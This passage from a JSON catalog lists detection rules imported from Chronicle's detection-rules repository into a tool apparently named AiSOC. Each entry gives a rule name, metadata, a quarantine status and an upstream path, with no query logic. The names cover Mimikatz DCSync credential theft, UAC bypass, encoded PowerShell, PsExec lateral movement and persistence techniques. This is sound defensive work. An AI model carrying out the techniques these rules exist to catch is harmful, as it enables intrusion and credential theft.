"mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-sload-dropper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"chronicle/detection-rules", "source_id": "malware_sload_dropper", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/sload_dropper.yaral" } }, { "id": "chronicle-detection-rules-malware-user-agent", "type": "detection", "name": "malware_user_agent", "description": "malware_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/malware_user_agent.yaral" } }, { "id": "chronicle-detection-rules-malware-wannacry-killswitch-domain", "type": "detection", "name": "malware_wannacry_killswitch_domain", "description": "malware_wannacry_killswitch_domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-wannacry-killswitch-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", 
"source_id": "malware_wannacry_killswitch_domain", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/wannacry_killswitch_domain.yaral" } }, { "id": "chronicle-detection-rules-malware-zeppelin-registry", "type": "detection", "name": "malware_zeppelin_registry", "description": "malware_zeppelin_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-zeppelin-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_zeppelin_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/zeppelin_registry.yaral" } }, { "id": "chronicle-detection-rules-mavinject-process-injection", "type": "detection", "name": "mavinject_process_injection", "description": "mavinject_process_injection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mavinject-process-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"mavinject_process_injection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/mavinject_process_injection.yaral" } }, { "id": "chronicle-detection-rules-metasploit-framework-user-agents-proxy", "type": "detection", "name": "metasploit_framework_user_agents_proxy", "description": "metasploit_framework_user_agents_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/metasploit-framework-user-agents-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "metasploit_framework_user_agents_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/metasploit_framework_user_agents__proxy.yaral" } }, { "id": "chronicle-detection-rules-microsoft-binary-github-communication", "type": "detection", "name": "microsoft_binary_github_communication", "description": "microsoft_binary_github_communication", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/microsoft-binary-github-communication.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "microsoft_binary_github_communication", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/microsoft_binary_github_communication.yaral" } }, { "id": "chronicle-detection-rules-microsoft-binary-suspicious-communication-endpoint", "type": "detection", "name": "microsoft_binary_suspicious_communication_endpoint", "description": "microsoft_binary_suspicious_communication_endpoint", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/microsoft-binary-suspicious-communication-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "microsoft_binary_suspicious_communication_endpoint", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/microsoft_binary_suspicious_communication_endpoint.yaral" } }, { "id": "chronicle-detection-rules-microsoft-office-product-spawning-windows-shell", "type": "detection", "name": "microsoft_office_product_spawning_windows_shell", "description": "microsoft_office_product_spawning_windows_shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/microsoft-office-product-spawning-windows-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "microsoft_office_product_spawning_windows_shell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/microsoft_office_product_spawning_windows_shell.yaral" } }, { "id": "chronicle-detection-rules-microsoft-teams-phishing-email", "type": "detection", "name": "microsoft_teams_phishing_email", "description": "microsoft_teams_phishing_email", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/microsoft-teams-phishing-email.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "microsoft_teams_phishing_email", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/microsoft_teams_phishing_email.yaral" } }, { "id": "chronicle-detection-rules-microsoft-workflow-compiler", "type": "detection", "name": "microsoft_workflow_compiler", 
"description": "microsoft_workflow_compiler", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/microsoft-workflow-compiler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "microsoft_workflow_compiler", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/microsoft_workflow_compiler.yaral" } }, { "id": "chronicle-detection-rules-mimikatz-dc-sync", "type": "detection", "name": "mimikatz_dc_sync", "description": "mimikatz_dc_sync", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mimikatz-dc-sync.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mimikatz_dc_sync", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/mimikatz_dc_sync.yaral" } }, { "id": "chronicle-detection-rules-mimikatz-through-windows-remote-management", "type": "detection", "name": 
"mimikatz_through_windows_remote_management", "description": "mimikatz_through_windows_remote_management", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mimikatz-through-windows-remote-management.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mimikatz_through_windows_remote_management", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/mimikatz_through_windows_remote_management.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1021-002-windows-admin-share", "type": "detection", "name": "mitre_attack_T1021_002_windows_admin_share", "description": "mitre_attack_T1021_002_windows_admin_share", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1021-002-windows-admin-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1021_002_windows_admin_share", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", 
"upstream_path": "rules/_deprecated/mitre_attack/T1021_002_windows_admin_share.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1021-002-windows-admin-share-basic", "type": "detection", "name": "mitre_attack_T1021_002_windows_admin_share_basic", "description": "mitre_attack_T1021_002_windows_admin_share_basic", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1021-002-windows-admin-share-basic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1021_002_windows_admin_share_basic", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1021_002_windows_admin_share_basic.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1021-002-windows-admin-share-with-asset-entity", "type": "detection", "name": "mitre_attack_T1021_002_windows_admin_share_with_asset_entity", "description": "mitre_attack_T1021_002_windows_admin_share_with_asset_entity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1021-002-windows-admin-share-with-asset-entity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1021_002_windows_admin_share_with_asset_entity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1021_002_windows_admin_share_with_asset_entity.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1021-002-windows-admin-share-with-user-enrichment", "type": "detection", "name": "mitre_attack_T1021_002_windows_admin_share_with_user_enrichment", "description": "mitre_attack_T1021_002_windows_admin_share_with_user_enrichment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1021-002-windows-admin-share-with-user-enrichment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1021_002_windows_admin_share_with_user_enrichment", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1021_002_windows_admin_share_with_user_enrichment.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1021-002-windows-admin-share-with-user-entity", "type": "detection", "name": "mitre_attack_T1021_002_windows_admin_share_with_user_entity", "description": "mitre_attack_T1021_002_windows_admin_share_with_user_entity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1021-002-windows-admin-share-with-user-entity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1021_002_windows_admin_share_with_user_entity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1021_002_windows_admin_share_with_user_entity.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1037-001-windows-logon-script", "type": "detection", "name": "mitre_attack_T1037_001_windows_logon_script", "description": "mitre_attack_T1037_001_windows_logon_script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1037-001-windows-logon-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1037_001_windows_logon_script", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1037_001_windows_logon_script.yaral" } }, { "id": 
"chronicle-detection-rules-mitre-attack-t1053-005-windows-creation-of-scheduled-task", "type": "detection", "name": "mitre_attack_T1053_005_windows_creation_of_scheduled_task", "description": "mitre_attack_T1053_005_windows_creation_of_scheduled_task", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1053-005-windows-creation-of-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1053_005_windows_creation_of_scheduled_task", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1053_005_windows_creation_of_scheduled_task.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1140-encoded-powershell-command", "type": "detection", "name": "mitre_attack_T1140_encoded_powershell_command", "description": "mitre_attack_T1140_encoded_powershell_command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1140-encoded-powershell-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"mitre_attack_T1140_encoded_powershell_command", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1140_encoded_powershell_command.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1218-005-windows-mshta-remove-usage", "type": "detection", "name": "mitre_attack_T1218_005_windows_mshta_remove_usage", "description": "mitre_attack_T1218_005_windows_mshta_remove_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1218-005-windows-mshta-remove-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1218_005_windows_mshta_remove_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1218_005_windows_mshta_remote_usage.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1543-001-macos-launch-agent", "type": "detection", "name": "mitre_attack_T1543_001_macos_launch_agent", "description": "mitre_attack_T1543_001_macos_launch_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/mitre-attack-t1543-001-macos-launch-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1543_001_macos_launch_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1543_001_macos_launch_agent.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1543-004-macos-launch-daemon", "type": "detection", "name": "mitre_attack_T1543_004_macos_launch_daemon", "description": "mitre_attack_T1543_004_macos_launch_daemon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1543-004-macos-launch-daemon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1543_004_macos_launch_daemon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1543_004_macos_launch_daemon.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1546-001-windows-change-default-file-association", "type": "detection", "name": "mitre_attack_T1546_001_windows_change_default_file_association", "description": "mitre_attack_T1546_001_windows_change_default_file_association", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1546-001-windows-change-default-file-association.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1546_001_windows_change_default_file_association", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1546_001_windows_change_default_file_association.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1547-001-windows-registry-run-keys-startup-folder", "type": "detection", "name": "mitre_attack_T1547_001_windows_registry_run_keys_startup_folder", "description": "mitre_attack_T1547_001_windows_registry_run_keys_startup_folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1547-001-windows-registry-run-keys-startup-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1547_001_windows_registry_run_keys_startup_folder", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/mitre_attack/T1547_001_windows_registry_run_keys_startup_folder.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1548-002-windows-uac-bypass", "type": "detection", "name": "mitre_attack_T1548_002_windows_uac_bypass", "description": "mitre_attack_T1548_002_windows_uac_bypass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1548-002-windows-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1548_002_windows_uac_bypass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1548_002_windows_uac_bypass.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1564-001-macos-hidden-files-and-directories", "type": "detection", "name": "mitre_attack_T1564_001_macos_hidden_files_and_directories", "description": "mitre_attack_T1564_001_macos_hidden_files_and_directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1564-001-macos-hidden-files-and-directories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", 
"source_id": "mitre_attack_T1564_001_macos_hidden_files_and_directories", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1564_001_macos_hidden_files_and_directories.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1564-001-windows-hidden-files", "type": "detection", "name": "mitre_attack_T1564_001_windows_hidden_files", "description": "mitre_attack_T1564_001_windows_hidden_files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1564-001-windows-hidden-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1564_001_windows_hidden_files", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1564_001_windows_hidden_files.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1564-001-windows-system-files", "type": "detection", "name": "mitre_attack_T1564_001_windows_system_files", "description": "mitre_attack_T1564_001_windows_system_files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/mitre-attack-t1564-001-windows-system-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1564_001_windows_system_files", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1564_001_windows_system_files.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1570-suspicious-command-psexec", "type": "detection", "name": "mitre_attack_T1570_suspicious_command_psexec", "description": "mitre_attack_T1570_suspicious_command_psexec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1570-suspicious-command-psexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1570_suspicious_command_psexec", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1570_suspicious_command_psexec.yaral" } }, { "id": "chronicle-detection-rules-mmc-spawning-windows-shell", "type": "detection", "name": "mmc_spawning_windows_shell", "description": "mmc_spawning_windows_shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mmc-spawning-windows-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mmc_spawning_windows_shell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/mmc_spawning_windows_shell.yaral" } }, { "id": "chronicle-detection-rules-mmc20-lateral-movement", "type": "detection", "name": "mmc20_lateral_movement", "description": "mmc20_lateral_movement", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mmc20-lateral-movement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mmc20_lateral_movement", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 